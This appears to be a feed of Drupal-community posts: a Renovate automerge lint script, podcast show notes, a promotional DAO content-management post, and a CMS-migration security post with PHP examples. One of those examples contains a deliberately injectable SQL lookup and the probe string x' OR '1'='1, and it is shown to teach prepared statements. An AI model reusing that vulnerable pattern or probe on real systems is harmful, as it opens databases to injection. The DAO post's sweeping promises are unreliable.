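A check for the automerge rules described above, as an added example (not the article's or Renovate's own code): it lints a Renovate config object against the stated policy that only minor and patch updates automerge, and only on a schedule. The helper names, finding codes and the three sample configs are constructed for illustration; package matchers are ignored, and branch protection lives on the Git host, outside what this check can see.

```javascript
// Added example: lint a Renovate config against the automerge policy in the text.
// auditRenovateConfig() and the finding codes are hypothetical names.
// Package matchers are ignored on purpose, so the check errs on the strict side.

const ALLOWED_AUTOMERGE_TYPES = new Set(["minor", "patch"]);

// Update types a rule can automerge that the policy does not allow.
function disallowedTypes(rule) {
  const types = rule.matchUpdateTypes;
  if (!Array.isArray(types) || types.length === 0) {
    return ["(all update types)"]; // no matchUpdateTypes: major is included
  }
  return types.filter((t) => !ALLOWED_AUTOMERGE_TYPES.has(t));
}

function auditRenovateConfig(config) {
  const findings = [];
  const rules = Array.isArray(config.packageRules) ? config.packageRules : [];
  let automergeEnabled = false;

  // Top-level automerge applies to every update type, major included.
  if (config.automerge === true) {
    automergeEnabled = true;
    findings.push({
      code: "GLOBAL_AUTOMERGE",
      detail: "top-level automerge covers major updates; scope it in packageRules",
    });
  }

  rules.forEach((rule, index) => {
    if (rule.automerge !== true) return;
    automergeEnabled = true;
    const bad = disallowedTypes(rule);
    if (bad.length > 0) {
      findings.push({
        code: "UNSCOPED_AUTOMERGE",
        detail: `packageRules[${index}] automerges ${bad.join(", ")}`,
      });
    }
  });

  const schedule = config.automergeSchedule;
  const hasSchedule = Array.isArray(schedule) && schedule.length > 0;
  if (automergeEnabled && !hasSchedule) {
    findings.push({ code: "NO_AUTOMERGE_SCHEDULE", detail: "no automergeSchedule limits merge times" });
  }
  if (!automergeEnabled && hasSchedule) {
    findings.push({ code: "INERT_SCHEDULE", detail: "automergeSchedule is set but nothing automerges" });
  }
  if (hasSchedule && typeof config.timezone !== "string") {
    findings.push({ code: "NO_TIMEZONE", detail: "schedule is evaluated in UTC" });
  }
  return findings;
}

// Constructed sample 1: grouping rules only, shaped like the sample on this page.
const GROUPS_ONLY = {
  timezone: "America/New_York",
  automergeSchedule: ["every weekend"],
  automerge: false,
  packageRules: [
    { matchPackageNames: ["drupal/core", "drupal/core-recommended"], groupName: "Drupal Core" },
  ],
};

// Constructed sample 2: weak, every update type may automerge at any hour.
const WEAK = {
  automerge: true,
  packageRules: [{ matchManagers: ["composer"], automerge: true }],
};

// Constructed sample 3: minor and patch automerge off-peak, major waits for review.
const POLICY = {
  timezone: "America/New_York",
  automergeSchedule: ["every weekend"],
  automerge: false,
  packageRules: [
    { matchUpdateTypes: ["minor", "patch"], automerge: true },
    { matchUpdateTypes: ["major"], automerge: false },
  ],
};

function codes(config) {
  return auditRenovateConfig(config).map((f) => f.code);
}

for (const [name, cfg] of Object.entries({ GROUPS_ONLY, WEAK, POLICY })) {
  console.log(name, codes(cfg));
}
```

Run it with Node.js; to audit a real repository, parse its renovate.json and pass the resulting object to auditRenovateConfig().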

Conclusion

There is no end to updating packages. Configuring Renovate allows more time and expertise to be spent on improving your website instead of constantly performing maintenance.

Dec 04 2023

On today’s show we are turning the tables and Nic and John will be interviewed by our guest host Melissa Bent. We’ll also cover Content Model Documentation as our module of the week.

For show notes visit:
www.talkingDrupal.com/427

Topics

  • What made you decide to start the podcast
  • Who does what tasks
  • The first episode was on May 30 2013. What do you know now that you wish you knew then
  • When did the guest host start
  • What has been your favorite episode
  • How did you come to this format
  • Where did the tagline come from
  • What technology do you use in production
  • The show is supported by multiple platforms, would you recommend this
  • What advice would you give someone just starting

Resources

Guests

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi

Hosts

Melissa Bent - linkedin.com/in/melissabent merauluka

MOTW

Correspondent

Martin Anderson-Clutz - @mandclu
Content Model & Site Documentation

  • Brief description:
    • Have you wanted to make your Drupal site self-documenting directly within the admin UI? There’s a module for that.
  • Brief history
    • How old: created in Jan 2023
    • Versions available: 1.0.23, compatible with Drupal 9 and 10
  • Maintainership
    • Actively maintained, latest release was a week ago
    • Test coverage
    • No official guide, but there was a recent talk about the module at GovCon, so you can watch that
    • Number of open issues: 43 open, 9 of which are bugs
  • Usage stats:
  • Maintainer(s):
    • Steve Wirt (swirt) who works for Civic Actions
  • Module features and usage
    • Allows your Drupal site to generate its own documentation
    • Has fieldable Content Model Document entities that allow you to customize what data will be stored
    • Can optionally document things like your content types, taxonomies, block types, paragraph types, and more
    • Documentation elements can also be associated with parts of your site configuration, and they become available within the relevant parts of your admin UI. For example, if you add documentation for a specific content type, when a site builder goes into edit that content type they will see a link to the documentation as a tab
    • You can generate entity relationship diagrams using MermaidJS
    • Also includes a field search capability originally developed as a separate module by Matthieu Scarset, who was a guest on this show back in episode #298
    • Will also generate diagrams to illustrate your content workflows, showing the states defined and the transitions between them
Dec 04 2023

Disclaimer: This blog is based on analyzing events that have taken place in the DAO market over the past few years. The DAO market is unpredictable, so we are not responsible for your sudden desire to start creating blockchain content right now.
This blog offers insights into Decentralized Autonomous Organizations (DAOs), which are often subject to innovation, cosmic disruptions, and quantum leaps.
Note: the future is uncertain, so no one can know exactly what will happen next minute. It can surprise you with an unexpected challenge. However, you must first get acquainted with DAO to learn how to make money on both. Please fasten your seat belts because we are going on an incredible journey.
But: Before acting independently, consult our expert to avoid any mistakes or spontaneous DAO-related endeavors.

What are DAOs or decentralized autonomous organizations?

To understand what DAOs are, let us give you an example. Imagine a dinner with your friends. To make everyone happy, you form a DAO. That is, you discuss all the options for dishes, dining style, and so on. Then you vote, make a choice collectively, and accept the option that is the best compromise or the most desirable for your group. As a result, by exploring and making decisions together, you achieve the optimal result.
DAOs can be a real revolution in many areas. They are currently used in the financial sector, governance, and content creation. This approach can be integrated into almost any system where democracy prevails and all participants collaborate to make decisions. A DAO is not merely a democracy-like approach; it is a more advanced version of one.

What is the goal of Content Management with DAOs?

You can integrate more efficient content management into your system or company with DAOs. The essence of this approach is inclusivity and accessibility to everyone.
1. Decentralization and democratization
The top idea of decentralized autonomous organizations is to get rid of centralized governing. Unlike the usual hierarchy, the DAO system gives everyone a voice to participate in decision-making. Thus the opinion of each specialist will be taken into account.
2. Transparency and trust
Unlike other content management tools, DAO is the most transparent and trustworthy approach. The system is completely transparent, and thanks to the blockchain, content creators will never lose ownership.
3. Fair compensation 
DAO integrates into business, forming fair rewards for content creators who invest their time and material in developing the project. This highly optimized system allows you to automate most of the processes related to bonuses for each author in your company or service.
4. High-quality curation and detection
DAO has everything to check and validate the content. Using blockchain and DAO, you can create a rating system that will help you identify the creators of the most relevant or interesting content.
5. Innovations and experiments in the content
Thanks to DAO, the content industry is constantly evolving. This management method allows you to integrate and test experimental approaches into your projects, which you can use to create effective strategies and build non-traditional content management.
6. Community engagement and collab
Using DAO, the community can manage content skillfully and create a loyal atmosphere within the project. By integrating DAO into your project, you can increase the level of loyalty of potential customers by directly involving them in all processes.

What is Content Management with DAOs best suited for?

Administering and managing content with DAO is an exciting and effective solution. Businesses in the following areas should pay special attention to DAO:
Collaborative content platforms
Many authors often communicate on such platforms, and until recently, each of them could be left without a voice if they visited the site at the wrong time. Using DAOs will allow such organizations to guarantee the right to vote to every author, regardless of whether they can answer a question at a particular time.
Independent publishing houses and journalism
Journalism is an ideal industry for DAOs, as it is vital to take into account the opinions of everyone, including authors. By integrating DAO and a rating system into your content management system, you can eliminate the clutter that many authors can create and offer much more efficient solutions for all authors to collaborate for the common good.
Artistic communities
Having a voice that DAO can offer is crucial in such communities. Due to the high level of exclusivity of DAOs, each member of such a community will have a guaranteed right to vote regardless of the situation and the issue at hand.
Knowledge sharing platforms
DAOs can be used to create platforms where people can share their knowledge and experience. This allows for the creation of decentralized educational systems and collaborative learning environments.
Niche communities
DAOs can be an excellent tool for administering content in narrowly focused communities. To a certain extent, in such communities, a DAO becomes a bulwark of structure, allowing each community member to participate in deciding the fate of the content. A DAO also enables such communities to share information quickly and easily, considering all community members' interests.
Community-funded content
Thanks to the features available in DAO, not only authors get the opportunity to choose and help. Thus, readers can support individual authors with tokens using smart contracts. This feature, in addition to systematizing the release of content, also allows creating attractive conditions for authors and integrating a limited level of competition into the community with minimal pursuit of rewards.
Disruption of traditional publishing models
Unlike classical publishing administration and management systems, DAO offers a different way of looking at simple things. Instead of hiding information from readers, DAO offers to make publishers fully transparent, increasing user loyalty and benefiting the publisher itself.

DAO generally improves the content administration and management procedure, allowing creators and other platform participants to make decisions and even vote for them with cryptocurrency. Integrating DAOs enables the creation of a transparent and fair community with a moderate level of competition and sufficient incentives for development, but what other problems does content management with DAOs solve?

What problems does Content Management with DAOs solve?

Using DAO for content management solves a large number of problems, among them:

  • Lack of inclusivity in decision-making
  • Lack of transparency in the distribution of budgets and revenues
  • Lack of correlation between the quality of work and the popularity of authors and their remuneration
  • Excessive control and censorship of critical processes
  • Inability to integrate the client into the administration process
  • Low efficiency of content search tools
  • Minimal control over content and problems with obtaining ownership of it
  • Lack of opportunities for testing and innovative views

How does Content Management with DAOs work?

Blockchain technology is used to implement inclusive content management on the DAO platform. Here's a simplified explanation of how it works:

  • Decentralized infrastructure
    The blockchain and its nodes make all DAO information transparent, accessible, and non-fungible.
  • Smart contracts
    Smart contracts enforce the rules and conditions of cooperation within DAOs. They can be used to reward authors and attract users' attention by automatically fulfilling specific promotional needs.
  • Content creation
    Thanks to DAO and blockchain, authors can tokenize content, making themselves the only creator with exclusive ownership.
  • Content curation and voting
    The DAO community curates content by rating and voting on submitted content. Voting mechanisms can be based on reputation systems or token-weighted votes, allowing participants to have a say in determining which content is published or promoted.
  • Transparent governance
    Unlike other examples of content management and administration systems, DAO offers a high level of inclusiveness, and everyone can influence decisions and evaluations in such a system.
  • Fair compensation
    Using smart contracts and DAO, you can integrate an automatic system for calculating rewards into the platform, depending on predefined rules that are universal for everyone.
  • Community engagement
    Thanks to the inclusivity of DAO, you can significantly increase user engagement in your platform by having them directly participate in their future.

With DAOs and blockchain, you can create a platform where every creator can monetize their content while every user can influence the platform's future. Thus, you can create an extremely successful project using simple but highly effective technologies of the future.

Advantages and Disadvantages of Using Content Management with DAOs

Using Content Management with DAOs (Decentralized Autonomous Organizations) can offer advantages and disadvantages. 

Advantages

Decentralization: As a DAO is decentralized, no specific person controls the system.
Transparency: Decentralization allows DAOs to achieve high clarity, essential for gaining customer and user loyalty and trust.
Efficiency: DAOs are usually much more efficient than other administration and management systems.
Scalability: Due to the peculiarities of the DAO structure, it is straightforward to scale to the volumes you need.

Disadvantages

Complexity: DAO can be complicated to create and manage.
Security: Despite decentralization, DAOs can still be subject to successful attacks.
Regulation: Many jurisdictions currently lack a regulatory definition and recognition of DAOs.
Lack of experience: DAOs are not currently a widespread way of running a company, so gaining DAO experience is extremely difficult.

To summarise, it is safe to say that DAO can potentially revolutionize companies' operations. At the same time, you must deal with this management principle's drawbacks.

Content Management with DAOs Types

To make sure that DAO is adequate, we have prepared a few examples of successful use of DAO for content administration:

Wiki DAO

Wiki DAO is a decentralized organization that uses DAO to manage content based on a Wiki.

Discussion DAOs

Discussion DAOs are services and sites that use DAOs to create a network of discussion forums. 

DAOs running blogs

A blog DAO is a decentralized autonomous organization that uses its blog to manage. 

Document DAO

Document DAO is a DAO whose primary tool is documents. This project uses a DAO to regulate records-related issues and implement rewards for those authors.

The choice of instructions for DAO directly depends on your company's needs. Having familiarized yourself with the structure and theoretical part of DAO, you can easily choose the structure and rules that will be optimal for your project.

What is the future of Content Management with DAOs?

The future of content management with DAOs is still being determined. As is usually the case, it is currently unknown what the future holds for DAO. At the same time, many different trends can be used to predict the future of DAO. One of the most discussed and popular trends is DApps. 
DApps are mobile applications and software solutions that work on the blockchain and are completely transparent. The popularity of this trend is easy to explain, as DApps are accessible and understandable to many users. The combination of a high level of security and full transparency makes DApps a leader among the relevant topics.
Another trend related to DAO is the integration principles of decentralized autonomous association to obtain certain functionalities and achieve results. For example, some companies are now implementing and testing DAO as a system for managing entire projects, and the results of such tests are extremely positive.
In addition to those already mentioned, at least a few other trends indicate a bright future for DAO. We are talking about Web 3.0, which should change everything, and about artificial intelligence, which can already perform in seconds the monotonous work that would take a specialist a lot of time. We should also remember the development of machine learning.

The fact that these trends are currently among the most popular topics for discussion indicates that DAO is guaranteed a bright future, but what will it be like? There are many assumptions about what the future holds for DAO. Here are a few of them:

  • The DAO principle will continue to evolve to provide content management capabilities with better inclusivity and efficiency.
  • DAO will become even more inclusive and be used by more large and small companies for better content management.
  • The DAO principle will be used to create an atmosphere of consistency and engagement with users. Thus, the content administration will be entrusted entirely to the readers themselves.
  • DAO technologies and capabilities will be used for machine learning and developing artificial intelligence technologies.

To sum up

Overall, the Golems team believes that DAO is the future of content management. Thanks to its capabilities and functions, transparency and security, and of course, inclusiveness, this system is guaranteed to be in demand, and over time, it may even completely replace the classic hierarchical structure with a more constructive and efficient view of company and content management. We are excited to see how DAOs are used to manage content in the future! 

Nov 30 2023

Takeaway: Securing data is a continuous process, not just a one-time action. When we talk about CMS migration, especially for sites with sensitive information, the focus should be as much on keeping data safe during the move as on ensuring its ongoing security afterward.

As someone deeply involved in CMS migrations, my experience has shown that the real challenge lies not just in moving data, but in maintaining its integrity every step of the way.

This blog aims to clarify the challenges of ensuring security during a CMS migration, focusing on the tools, strategies, and best practices essential to protect your data. Whether you’re dealing with a government website or a private sector project, understanding these nuances is key.

We’ll explore how to identify and tackle potential security vulnerabilities, the significance of using the right tools and encryption, and how we applied these to Riverside County.


Riverside County website homepage

Understanding security vulnerabilities in CMS migrations

In my experience with CMS migrations, particularly with platforms like Drupal, the security risks are often more subtle and complex than one might anticipate. We find key vulnerabilities not just in the potential for external threats, such as hacking or data breaches, but also in the migration process itself—like data handling and user access management.

Identifying vulnerabilities before migration

The first step in ensuring a secure migration is a thorough evaluation of your current system. This means looking beyond the surface and diving into the details of your CMS’s structure and data handling.

For example, how are user profiles managed? Are there any outdated modules or themes that might pose a risk? These aspects need to be carefully reviewed, especially for sites with a lot of user data or government information. The focus should be on identifying any weak points that could be exploited during the migration process.

It’s not just me who suggests this either. Look at what David Rubie-Todd, Co-Founder and Marketing Director of Glide, has to say about this:

"For me, the best way is to perform a thorough audit of the data before initiating the migration process. This may not be an obvious step, but it's crucial to identify any potential vulnerabilities or outdated data that could compromise security during the transfer.

This approach came about after a migration project I was leading where we discovered halfway through that some of the data had not been updated in over five years and was not compliant with the current security protocols. It taught me the vital lesson of being proactive rather than reactive when it comes to data security during CMS migration."

Zephyr Chan, Founder and Growth Marketer of Better Marketer also puts it nicely:

"Migrating outdated, unnecessary, or sensitive data not only clutters your new CMS but also increases security risks.

I learned this the hard way during an early migration. We transferred everything, including old accounts and outdated files. It was a mess and a security headache. Post-migration, we found ourselves sifting through a digital junkyard.

Before any migration, you should audit your data thoroughly. You can remove what's not needed. This approach streamlines the migration and tightens security. It's like moving house—why pack and move stuff you don't need?"

Cluttered desktop. Image from ZME Science.

Having a separate database layer

When migrating to a new system, it's crucial to ensure that not only your Drupal codebase is secure but also your database and server. Ideally, the database should be on a different server than your codebase to enhance security against potential hacking attempts.

There should be a separate database layer to prevent easy access to your database. It's essential to store the database safely in a different location. The code and database servers should interact using encryption keys for security.

Database layer

Best practices suggest that for migrations, whether you’re migrating from an older version of Drupal (Drupal 7 or earlier) or from another CMS to Drupal, attention should be paid to the locations of the database, file system, code, and repositories, like GitHub.

Previously, these components were often stored on the same server, but now, with improved security practices, it's important to ensure proper configuration even before updating or upgrading your Drupal systems.

Why a proactive approach in security is best

A proactive approach to security is non-negotiable. This involves not just patching up known vulnerabilities but anticipating potential issues that could show up during migration. It's about being one step ahead.

Montserrat Cano, International SEO and Digital Marketing Consultant at Montserrat Cano believes in involving the IT team right from the start:

"Involve the right people! During the migration process, especially during a re-platforming, there is a particular moment when the website is especially vulnerable to cyber-attacks. Working closely with your IT team will help protect your brand.

A second tip is to ensure that you audit well to understand what data there is and what you need to keep. This is especially important with customer data. Back up data in case of any issues."

In practice, this means ensuring that all software is up-to-date, using robust encryption methods for data transfer, and being vigilant about access controls and permissions. The goal is to mitigate risks before they become actual problems.

Alex Stasiak, CEO and Founder of Startup House, recommends the same thing: practicing the principle of least privilege.

"Only give access rights to those who absolutely need them for the tasks at hand. We stumbled upon the value of this approach after a migration where excessive access led to unintended data exposure. By narrowing access, the chance of leaks tightens up significantly. Couple this with real-time monitoring to catch any unauthorized access attempts, and you turn your data migration into a fortress, with data moving securely and only accessible to a select few knights sworn to protect it."

Tools and strategies for a secure migration

A successful and secure CMS migration hinges on a combination of the right tools and their strategic application. It's about weaving a tight security fabric that leaves no loose ends.

Choosing the right tools for the job

The effectiveness of the migration largely depends on the tools we choose. For instance, in Drupal migrations, I often rely on PHP Data Objects (PDO) for database abstraction. This isn’t just a preference; it’s about ensuring the highest level of security in data handling.

We encrypt sensitive information such as API keys, tokens, passwords, and personal data. This encryption, along with PDO statements, ensures secure data insertion into the new database.

Another indispensable tool in our arsenal is the Security Review module in Drupal. It’s like having a vigilant guard that continuously monitors the site’s security status, pinpointing vulnerabilities and guiding us on how to fortify our defenses.

New Relic Digital Experience Monitoring is another tool we use, which comes standard with Acquia. It's instrumental in identifying security threats.

For example, if we’re getting slow web transactions, slow queries and repeated attempts, New Relic helps us detect that. We can then block the offending IP address. This tool is invaluable for maintaining site performance and security, allowing us to quickly identify and address issues like bot attacks.

But it’s not just about having the right tools—it's about how you use them. Take PDO, for example. We don’t just use it for database interactions; we make sure each data field is processed through secure functions.

This meticulous approach is critical in preventing vulnerabilities like SQL injection. Similarly, data sanitization, particularly in web forms, is a practice we emphasize repeatedly. It’s about making sure that what goes into your database is exactly what’s supposed to go in—nothing more, nothing less.

I’ll go into these in detail when I discuss the Riverside County project.

The crucial role of encryption

A key aspect we can’t overlook during migration is encryption. It’s our fail-safe. Drupal actually provides options for encrypting keys. For instance, if your file system and database are on different servers, Drupal has modules that encrypt and store these keys securely. This ensures that whether the data is on a development, test, or cloud server, it remains out of reach from unauthorized access.

I like how Burak Özdemir, Founder of ozdemirburak.com puts this:

"In spy movies, there's always that tiny device that destroys all the evidence. We don't go that far, but we do something sort of similar with encryption keys. 

They are kept separate from the data. If someone grabs our database, they'd just get gibberish without the key. 

The "aha" moment came when we heard about a company that lost everything because their keys were taped to the data—figuratively speaking. Not us. We keep our keys in our pocket, away from prying eyes."

Another example I can give you is when I worked on the Knowledge Network project. They had a lot of sensitive user data on their website. They were concerned about how this data would be handled, especially on test servers.

British Columbia's Knowledge Network logo

At Promet, we specifically wrote scripts in Drupal to encrypt data flagged by the client. The migration scripts were carefully crafted to ensure data security.

Drupal offers default modules like Migrate, Migrate Upgrade, and Migrate Tools for migrations, which are user-friendly. Additionally, you can incorporate custom code to encrypt sensitive user data. Drupal provides numerous examples on how to write these scripts, allowing you to customize and execute them for secure data migration to the new system.

Speaking of which, Drupal is impressive in this regard. They offer a lot of test scripts within their migration-related modules. When you install these modules, they provide a set of test scripts that you can modify and use for your migration. It's quite handy and effective.

This is one of the many reasons why we advocate for open source for government websites—you don’t really get these with proprietary systems.
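The encryption of client-flagged fields described in this section, with the key held apart from the data, can be sketched as follows. This is an added example, not Promet's migration scripts and not the API of Drupal's Key or Encrypt modules; the `MIGRATION_KEY` variable, the table, the column names and the sample row are all assumptions made for illustration (PHP 8 with the bundled sodium and pdo_sqlite extensions).

```php
<?php
declare(strict_types=1);

// Columns the client flagged as sensitive (constructed names).
const FLAGGED_COLUMNS = ['phone', 'date_of_birth'];

/** Loads the 32-byte key from the environment, never from the database. */
function loadKey(): string
{
    // MIGRATION_KEY is a hypothetical variable name holding a base64 key.
    $encoded = getenv('MIGRATION_KEY');
    if ($encoded === false) {
        throw new RuntimeException('MIGRATION_KEY is not set');
    }
    $key = base64_decode($encoded, true);
    if ($key === false || strlen($key) !== SODIUM_CRYPTO_SECRETBOX_KEYBYTES) {
        throw new RuntimeException('MIGRATION_KEY must decode to 32 bytes');
    }
    return $key;
}

/** Authenticated encryption; a fresh random nonce is stored with each value. */
function encryptField(string $plaintext, string $key): string
{
    $nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    return base64_encode($nonce . sodium_crypto_secretbox($plaintext, $nonce, $key));
}

/** Reverses encryptField(); throws if the key is wrong or the value was altered. */
function decryptField(string $stored, string $key): string
{
    $raw = base64_decode($stored, true);
    $minLength = SODIUM_CRYPTO_SECRETBOX_NONCEBYTES + SODIUM_CRYPTO_SECRETBOX_MACBYTES;
    if ($raw === false || strlen($raw) < $minLength) {
        throw new RuntimeException('Malformed ciphertext');
    }
    $nonce = substr($raw, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $box = substr($raw, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $plain = sodium_crypto_secretbox_open($box, $nonce, $key);
    if ($plain === false) {
        throw new RuntimeException('Wrong key or tampered ciphertext');
    }
    return $plain;
}

/** Copies one legacy row into the target, encrypting flagged columns first. */
function migrateRow(PDOStatement $insert, array $row, string $key): void
{
    foreach (FLAGGED_COLUMNS as $column) {
        $row[$column] = encryptField($row[$column], $key);
    }
    $insert->execute([
        ':name'  => $row['name'],
        ':phone' => $row['phone'],
        ':dob'   => $row['date_of_birth'],
    ]);
}

// --- Demo with constructed data ---------------------------------------------
// For the demo only, a fresh key is placed in the environment. In a real run
// the variable is provisioned outside the script and outside the database.
putenv('MIGRATION_KEY=' . base64_encode(sodium_crypto_secretbox_keygen()));
$key = loadKey();

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE profile (id INTEGER PRIMARY KEY, name TEXT, phone TEXT, date_of_birth TEXT)');
$insert = $pdo->prepare('INSERT INTO profile (name, phone, date_of_birth) VALUES (:name, :phone, :dob)');

$legacyRows = [
    ['name' => 'Jane Example', 'phone' => '+1 555 0100', 'date_of_birth' => '1980-01-31'],
];
foreach ($legacyRows as $row) {
    migrateRow($insert, $row, $key);
}

// What a copy of the database (for instance on a test server) would contain.
$stored = $pdo->query('SELECT name, phone FROM profile')->fetch(PDO::FETCH_ASSOC);
printf("stored phone differs from plaintext: %s\n", $stored['phone'] !== '+1 555 0100' ? 'yes' : 'no');
printf("decrypted with the key: %s\n", decryptField($stored['phone'], $key));

try {
    decryptField($stored['phone'], sodium_crypto_secretbox_keygen());
} catch (RuntimeException $e) {
    printf("with a different key: %s\n", $e->getMessage());
}
```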

Navigating government standards in the Riverside County project

For Riverside County, our approach was multifaceted, involving the meticulous migration of content from over 50 non-Drupal websites into Drupal. This wasn’t just a matter of transferring data; it was about redefining how we protect it during the migration.

How our team ensured security for the Riverside County migration

Here’s a quick summary:

Secure CMS migration checklist

The key aspect is staying up-to-date with security releases. We subscribe to all Drupal release notifications and ensure that all modules and themes are consistently updated.

The first point to note is that we always use the Security Review module for every project. This is a standard practice, whether it's a newly migrated website or one we're building from scratch. This applies to all migrations, whether Drupal-to-Drupal or from another CMS to Drupal. Anything coming into Drupal undergoes this security review.

Next, writing secure code is crucial. Drupal has robust standards for coding, including specific functions to use when interacting with data. This includes stripping off extra or special characters. At Promet, we adhere to these secure coding standards in all our custom code and patches.

Managing sensitive keys effectively is another crucial aspect as I mentioned earlier. Drupal's Key module is excellent for handling various keys, like API keys, encryption keys, and database keys. It ensures all sensitive keys are securely stored and managed.

Additionally, we use Twig templates for front-end display. These templates ensure that data coming from the database is properly sanitized and presented in a user-friendly format.

For instance, they can filter out extraneous characters, like Chinese or Persian characters, displaying data in plain English. This also applies to form inputs, ensuring we only capture and store clean data in our database.

So, the security measures apply in both directions. We use a database abstraction layer for querying the database. We utilize PDO, which means we don't use straightforward queries. Instead, each field goes through a secure function, ensuring SQL injection is completely mitigated.
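The difference between a "straightforward" query and one where each field is bound through PDO, as described here and in the earlier section on tools, is shown in the added example below. It is not Promet's or Drupal's code; the table, the rows and the validation rules are constructed, and an in-memory SQLite database stands in for the migration target (needs pdo_sqlite).

```php
<?php
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, mail TEXT NOT NULL)');

// Constructed legacy rows. The second name contains an apostrophe, the third
// carries SQL metacharacters, and the fourth has an invalid e-mail address.
$legacyRows = [
    ['name' => 'alice',         'mail' => 'alice@example.org'],
    ['name' => "Conor O'Brien", 'mail' => 'conor@example.org'],
    ['name' => "x' OR '1'='1",  'mail' => 'probe@example.org'],
    ['name' => 'bob',           'mail' => 'not-an-address'],
];

/** Inserts one row through a prepared statement; false means it was rejected. */
function migrateUser(PDOStatement $insert, array $row): bool
{
    $name = trim($row['name']);
    // Validate against what the column is supposed to hold before writing.
    if ($name === '' || strlen($name) > 60) {
        return false;
    }
    if (filter_var($row['mail'], FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    // Values travel separately from the SQL text, so quotes stay data.
    $insert->execute([':name' => $name, ':mail' => $row['mail']]);
    return true;
}

/** Deliberately vulnerable "before" form: input becomes part of the SQL text. */
function findByNameUnsafe(PDO $pdo, string $name): array
{
    return $pdo->query("SELECT id, name FROM users WHERE name = '$name'")
               ->fetchAll(PDO::FETCH_ASSOC);
}

/** Hardened form: the statement is fixed, the value is bound. */
function findByNameSafe(PDO $pdo, string $name): array
{
    $stmt = $pdo->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$insert = $pdo->prepare('INSERT INTO users (name, mail) VALUES (:name, :mail)');
$pdo->beginTransaction();
$rejected = 0;
foreach ($legacyRows as $row) {
    if (!migrateUser($insert, $row)) {
        $rejected++;
    }
}
$pdo->commit();

$total = (int) $pdo->query('SELECT COUNT(*) FROM users')->fetchColumn();
printf("migrated %d rows, rejected %d\n", $total, $rejected);

// The same hostile-looking string, looked up both ways.
$probe = "x' OR '1'='1";
printf("interpolated query matched %d rows\n", count(findByNameUnsafe($pdo, $probe)));
printf("prepared query matched %d rows\n", count(findByNameSafe($pdo, $probe)));

// Interpolation also breaks on ordinary data that contains an apostrophe.
try {
    findByNameUnsafe($pdo, "Conor O'Brien");
} catch (PDOException $e) {
    printf("interpolated query failed on a legitimate name: %s\n", $e->getMessage());
}
printf("prepared query found the same name: %d row\n", count(findByNameSafe($pdo, "Conor O'Brien")));
```

The interpolated lookup returns every row in the table for the probe string, while the prepared lookup returns only the one row whose name is literally that string.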

Regarding bot attacks and failed login attempts, we have measures in place to address these. If we detect multiple failed login attempts from the same IP address—say, four, five, or ten times—we block that account for a period like 24 or 48 hours. This is a configurable Drupal default security feature, tailored to each client's needs.

Drupal's flood table records failed login attempts, including the username and IP address involved. We can configure it to block access after a certain number of failed attempts, regardless of whether they come from the same or different IP addresses.
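The threshold logic described above, blocking by IP address and by account regardless of IP, can be modeled as below. This is an added, simplified model and not Drupal's flood implementation; the table name, the event names, the limits (taken from the ranges mentioned above) and the login timeline are all constructed.

```php
<?php
declare(strict_types=1);

// Example thresholds (assumptions): 5 failures per account in 24 hours,
// 10 failures per IP address in 1 hour.
const USER_LIMIT = 5;
const USER_WINDOW = 86400;
const IP_LIMIT = 10;
const IP_WINDOW = 3600;

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE flood_demo (event TEXT, identifier TEXT, timestamp INTEGER, expiration INTEGER)');

/** Records one failure; it stops counting once $window seconds have passed. */
function registerFailure(PDO $pdo, string $event, string $identifier, int $window, int $now): void
{
    $stmt = $pdo->prepare('INSERT INTO flood_demo VALUES (:e, :i, :t, :x)');
    $stmt->execute([':e' => $event, ':i' => $identifier, ':t' => $now, ':x' => $now + $window]);
}

/** True while the number of unexpired failures is below the limit. */
function isAllowed(PDO $pdo, string $event, string $identifier, int $limit, int $now): bool
{
    $stmt = $pdo->prepare(
        'SELECT COUNT(*) FROM flood_demo WHERE event = :e AND identifier = :i AND expiration > :now'
    );
    $stmt->execute([':e' => $event, ':i' => $identifier, ':now' => $now]);
    return (int) $stmt->fetchColumn() < $limit;
}

/** Returns 'ok', 'failed', 'blocked-ip' or 'blocked-user' for one login attempt. */
function attemptLogin(PDO $pdo, string $user, string $ip, bool $passwordOk, int $now): string
{
    // Thresholds are checked before the password, so a blocked source learns
    // nothing about whether its guess was right.
    if (!isAllowed($pdo, 'failed_login_ip', $ip, IP_LIMIT, $now)) {
        return 'blocked-ip';
    }
    if (!isAllowed($pdo, 'failed_login_user', $user, USER_LIMIT, $now)) {
        return 'blocked-user';
    }
    if ($passwordOk) {
        // A successful login clears the account counter.
        $clear = $pdo->prepare("DELETE FROM flood_demo WHERE event = 'failed_login_user' AND identifier = :i");
        $clear->execute([':i' => $user]);
        return 'ok';
    }
    registerFailure($pdo, 'failed_login_ip', $ip, IP_WINDOW, $now);
    registerFailure($pdo, 'failed_login_user', $user, USER_WINDOW, $now);
    return 'failed';
}

// --- Constructed timeline -----------------------------------------------------
$t = 1700000000;

// Five wrong passwords for one account, each from a different address.
for ($i = 0; $i < 5; $i++) {
    attemptLogin($pdo, 'editor', "198.51.100.$i", false, $t + $i * 60);
}
// The account is now blocked even for a correct password from a new address.
printf("editor, new IP, correct password: %s\n",
    attemptLogin($pdo, 'editor', '198.51.100.9', true, $t + 600));
// After the 24-hour window the failures have expired.
printf("editor, one day later: %s\n",
    attemptLogin($pdo, 'editor', '198.51.100.9', true, $t + USER_WINDOW + 600));

// Ten wrong passwords from one address, spread across different accounts.
for ($i = 0; $i < 10; $i++) {
    attemptLogin($pdo, "user$i", '203.0.113.7', false, $t + $i);
}
// That address is blocked for every account, including one it never tried.
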